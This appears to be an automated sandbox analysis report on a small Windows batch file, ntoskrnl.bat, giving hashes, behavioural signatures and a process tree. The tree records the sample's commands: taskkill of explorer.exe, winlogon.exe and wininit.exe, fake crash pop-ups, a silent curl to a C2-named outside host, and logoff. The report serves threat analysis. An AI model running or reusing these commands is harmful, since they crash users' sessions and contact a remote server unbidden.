Analysis

  • max time kernel
    30s
  • max time network
    14s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/09/2024, 15:24

General

  • Target

    ntoskrnl.bat

  • Size

    493B

  • MD5

    38e1e4c90b2c943e856bbe7c052ad3a2

  • SHA1

    07175f8e4095cf1b60d791a1d1a80908d5c2aca0

  • SHA256

    774820fb725e4af50219d46467650d3c7eb7e9a766d6069130f49a28f315d680

  • SHA512

    d7b79247122649c1e62185bd943f4f4c9ae48e700a0a836256027d4fa3fa53ee90cc7aa290aca8ad7280337ec9a928b1f86b4d92edad75ac1ac941de7219b655

Score
1/10

Malware Config

Signatures

  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ntoskrnl.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5088
    • C:\Windows\system32\msg.exe
      msg * Explorer has been crashed.
      2⤵
        PID:2476
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im winlogon.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4128
      • C:\Windows\system32\msg.exe
        msg * Windows Account Crashed.
        2⤵
          PID:1500
        • C:\Windows\system32\msg.exe
          msg * ERROR 404: FAILED TO FETCH RESOURCE FROM SERVER https://heckergd.serv00.net/data/C2.php
          2⤵
            PID:1844
          • C:\Windows\system32\curl.exe
            curl heckergd.serv00.net/data/C2.php --silent
            2⤵
              PID:1020
            • C:\Windows\system32\logoff.exe
              logoff
              2⤵
                PID:2836
              • C:\Windows\system32\taskkill.exe
                taskkill /f /im wininit.exe
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5040
            • C:\Windows\system32\LogonUI.exe
              "LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d
              1⤵
              • Modifies data under HKEY_USERS
              • Suspicious use of SetWindowsHookEx
              PID:2692

            Network

            MITRE ATT&CK Matrix

            Replay Monitor

            Loading Replay Monitor...

            Downloads